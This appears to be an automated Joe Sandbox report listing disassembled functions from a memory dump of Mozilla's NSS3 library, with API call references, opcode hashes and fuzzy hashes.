Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C5EAB3E,?,?), ref: 6C5EAC70

Part of subcall function 6C5CE300: TlsGetValue.KERNEL32 ref: 6C5CE33C
Part of subcall function 6C5CE300: EnterCriticalSection.KERNEL32(?), ref: 6C5CE350
Part of subcall function 6C5CE300: PR_Unlock.NSS3(?), ref: 6C5CE5BC
Part of subcall function 6C5CE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C5CE5CA
Part of subcall function 6C5CE300: TlsGetValue.KERNEL32 ref: 6C5CE5F2
Part of subcall function 6C5CE300: EnterCriticalSection.KERNEL32(?), ref: 6C5CE606
Part of subcall function 6C5CE300: PORT_Alloc_Util.NSS3(?), ref: 6C5CE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C5EAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5EAB3E), ref: 6C5EACD7
PORT_Alloc_Util.NSS3(?), ref: 6C5EAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C5EAD2B

Part of subcall function 6C5CF360: TlsGetValue.KERNEL32(00000000,?,6C5EA904,?), ref: 6C5CF38B
Part of subcall function 6C5CF360: EnterCriticalSection.KERNEL32(?,?,?,6C5EA904,?), ref: 6C5CF3A0
Part of subcall function 6C5CF360: PR_Unlock.NSS3(?,?,?,?,6C5EA904,?), ref: 6C5CF3D3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: fd0bc66782fc23a5afe493462d9e0a6e6d8babe2b0ce671d09294ff5beb4d75a
Instruction ID: f27059d9018eb7686b3837f6364f4b0dffb668f2cef565506b67a8bfd18afd9f
Opcode Fuzzy Hash: fd0bc66782fc23a5afe493462d9e0a6e6d8babe2b0ce671d09294ff5beb4d75a
Instruction Fuzzy Hash: ED3128B1E002059FEB00CF698C419AF7BB6AFD9718B198528F81957740EB31AC15C7A1

Function 6C5C8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C5C8C7C

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5C8CB0
TlsGetValue.KERNEL32 ref: 6C5C8CD1
EnterCriticalSection.KERNEL32(?), ref: 6C5C8CE5
PR_Unlock.NSS3(?), ref: 6C5C8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C5C8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C8D93

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: e143afea6d1e2b2de0e7aa37f56d767dd3dea5b4c7c1366a7a46b738ee7feac7
Instruction ID: bd2a74a4b45aa3b0fcb5122233f2ec1af199fe6c85866cfc00cb3f00b1152ae5
Opcode Fuzzy Hash: e143afea6d1e2b2de0e7aa37f56d767dd3dea5b4c7c1366a7a46b738ee7feac7
Instruction Fuzzy Hash: 4D312671B01601AFE7009FA8DC4479AB7B4BF55318F14053EEA1A67B50DB70A968C7C7

Function 6C609D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C609C5B), ref: 6C609D82

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C609C5B), ref: 6C609DA9

Part of subcall function 6C601340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60136A
Part of subcall function 6C601340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60137E
Part of subcall function 6C601340: PL_ArenaGrow.NSS3(?,6C59F599,?,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?), ref: 6C6013CF
Part of subcall function 6C601340: PR_Unlock.NSS3(?,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C60145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C609C5B), ref: 6C609DCE

Part of subcall function 6C601340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C6013F0
Part of subcall function 6C601340: PL_ArenaGrow.NSS3(?,6C59F599,?,?,?,00000000,00000000,?,6C5A895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C601445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C609C5B), ref: 6C609DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C609C5B), ref: 6C609DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C609C5B), ref: 6C609E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C609C5B), ref: 6C609E91

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

Part of subcall function 6C601560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C5FFAAB,00000000), ref: 6C60157E
Part of subcall function 6C601560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C5FFAAB,00000000), ref: 6C601592
Part of subcall function 6C601560: memset.VCRUNTIME140(?,00000000,?), ref: 6C601600
Part of subcall function 6C601560: PL_ArenaRelease.NSS3(?,?), ref: 6C601620
Part of subcall function 6C601560: PR_Unlock.NSS3(?), ref: 6C601639

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 5f1a401cbf0ab28d4c3503af6c804e809c6036c47c49745167884a77f1cad6c2
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 004181B4601606AFE748DF15DA40B92BBA2FF4534CF148128D9195BFA0EB72E835CF94

Function 6C5CDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C5CDDEC

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

PK11_DigestBegin.NSS3(00000000), ref: 6C5CDE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C5CDE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C5CDE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C5CDEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5CDEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CDECC

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 890e7da7a5e563baa93b4b419f647c5fd09eb1daf234eea525f9dbfe886dee21
Instruction ID: 5c9d0071d5cb28c4bd7ab81137fd98a62a33207e3a060d7981e5471c2393bce1
Opcode Fuzzy Hash: 890e7da7a5e563baa93b4b419f647c5fd09eb1daf234eea525f9dbfe886dee21
Instruction Fuzzy Hash: D831B9B6A40114ABDB00AEA5AC41BBB76A89F95708F050129ED05E7701F731DD18C6E3

Function 6C5A7E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5A7E48

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C5A7E5B

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A7E7B

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6C925C,?), ref: 6C5A7E92

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5A7EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C5A7ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C5A7EFA

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: 4965e3e02052c4677d19b6eaad043b3b7ec1cce5f01a031b706728c3d9db2ca3
Instruction ID: 4915acb47649db4d384abe13bea767bf82acb13efc1562230dba1c5b57f624e5
Opcode Fuzzy Hash: 4965e3e02052c4677d19b6eaad043b3b7ec1cce5f01a031b706728c3d9db2ca3
Instruction Fuzzy Hash: 4C31B1B2E012119BEB10CBBA9D40B5B77E8AF45298F194924ED55EBB05F730EC05CBE4

Function 6C5FDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C5FD9E4,00000000), ref: 6C5FDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C5FD9E4,00000000), ref: 6C5FDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C5FD9E4,00000000), ref: 6C5FDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5FDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5FDCAD

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 1a1ec4a7abaeff6a817f9f2a12f17eed6df1be379baadbbe4820e3eef1f2065c
Instruction ID: 9ca04b9cbdf91e5ef3156c7d9ac892be7bb4a2b984d9e147198e214fa64ef2bb
Opcode Fuzzy Hash: 1a1ec4a7abaeff6a817f9f2a12f17eed6df1be379baadbbe4820e3eef1f2065c
Instruction Fuzzy Hash: BF318DB5A002009FD714CF19DC90B52B7F8AF25358F148428E968CBB00E7B2E945CFA1

Function 6C5C2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C5BE728,?,00000038,?,?,00000000), ref: 6C5C2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5C2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5C2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C5C2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C5C2E9E
PR_Unlock.NSS3(?), ref: 6C5C2EAB
PR_Unlock.NSS3(?), ref: 6C5C2F0D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: b1b41146fb0fb4f99093565be6ae63a61c794ec6019fe21e68a0e4fb97687475
Instruction ID: 67885d11cf19fa601e005c8fec53fc26557f9f0cae74a52024008bc55b3624eb
Opcode Fuzzy Hash: b1b41146fb0fb4f99093565be6ae63a61c794ec6019fe21e68a0e4fb97687475
Instruction Fuzzy Hash: 313108B9B00105ABEB00AF69DC85876BB79FF45258F048578EC1897B11EB31EC64C7D2

Function 6C5E1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&^l,6C5C6295,?,00000000,?,00000001,S&^l,?), ref: 6C5E1ECB

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

TlsGetValue.KERNEL32(?,00000001,?,S&^l,6C5C6295,?,00000000,?,00000001,S&^l,?), ref: 6C5E1EF1
EnterCriticalSection.KERNEL32(?), ref: 6C5E1F01
PR_SetError.NSS3(00000000,00000000), ref: 6C5E1F39

Part of subcall function 6C5EFE20: TlsGetValue.KERNEL32(6C5C5ADC,?,00000000,00000001,?,?,00000000,?,6C5BBA55,?,?), ref: 6C5EFE4B
Part of subcall function 6C5EFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5EFE5F

PR_Unlock.NSS3(?), ref: 6C5E1F67

Strings

S&^l, xrefs: 6C5E1EA0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&^l
API String ID: 704537481-2751469739
Opcode ID: 01be0cb9f9f24515b1830f0248d3edeea61163fd1017e7560cf2131b4a1c936d
Instruction ID: b1d3a08bb862c95cab4a8f2636f4cb4666ed023de8cc68bb8d346faebf226dc3
Opcode Fuzzy Hash: 01be0cb9f9f24515b1830f0248d3edeea61163fd1017e7560cf2131b4a1c936d
Instruction Fuzzy Hash: E021F675A04204ABEB00EF29EC85E9B3769EF89368F144564FD2887B12EB31DD54C7E1

Function 6C60CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C60CD93,?), ref: 6C60CEEE

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C60CD93,?), ref: 6C60CEFC

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C60CD93,?), ref: 6C60CF0B

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C60CD93,?), ref: 6C60CF1D

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C60CD93,?,?,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF78

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 2a9be3c7daa3a2be0a54131965ccc662af9690ed4845223deb4bd6f0a2338aea
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 9311D8B1B00204A7E7085B666E41B6B76EC9F4524DF004039FC0AE7741FB60D90886BB

Function 6C5B8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5B8C1B
EnterCriticalSection.KERNEL32 ref: 6C5B8C34
PL_ArenaAllocate.NSS3 ref: 6C5B8C65
PR_Unlock.NSS3 ref: 6C5B8C9C
PR_Unlock.NSS3 ref: 6C5B8CB6

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

Strings

KRAM, xrefs: 6C5B8C8F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 0413d226379aaa1d8f52684c83c2379eead684cc3538975c26ecde4efea28bf7
Instruction ID: 40d25e05fec05686a80bd8dd6acc0b88f6de498fd37c88a1803e0da6139eb8a3
Opcode Fuzzy Hash: 0413d226379aaa1d8f52684c83c2379eead684cc3538975c26ecde4efea28bf7
Instruction Fuzzy Hash: AD218DB5A05A028FD700AF79C894559BBF4FF55304F05896ED8889B711EB31E889CBC6

Function 6C5C8E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C), ref: 6C5C8EA2

Part of subcall function 6C5EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5EF854
Part of subcall function 6C5EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5EF868
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5EF882
Part of subcall function 6C5EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5EF889
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5EF8A4
Part of subcall function 6C5EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5EF8AB
Part of subcall function 6C5EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5EF8C9
Part of subcall function 6C5EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5EF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C), ref: 6C5C8EC3
TlsGetValue.KERNEL32(?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C), ref: 6C5C8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C5E2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5C8EF1
PR_Unlock.NSS3 ref: 6C5C8F20

Strings

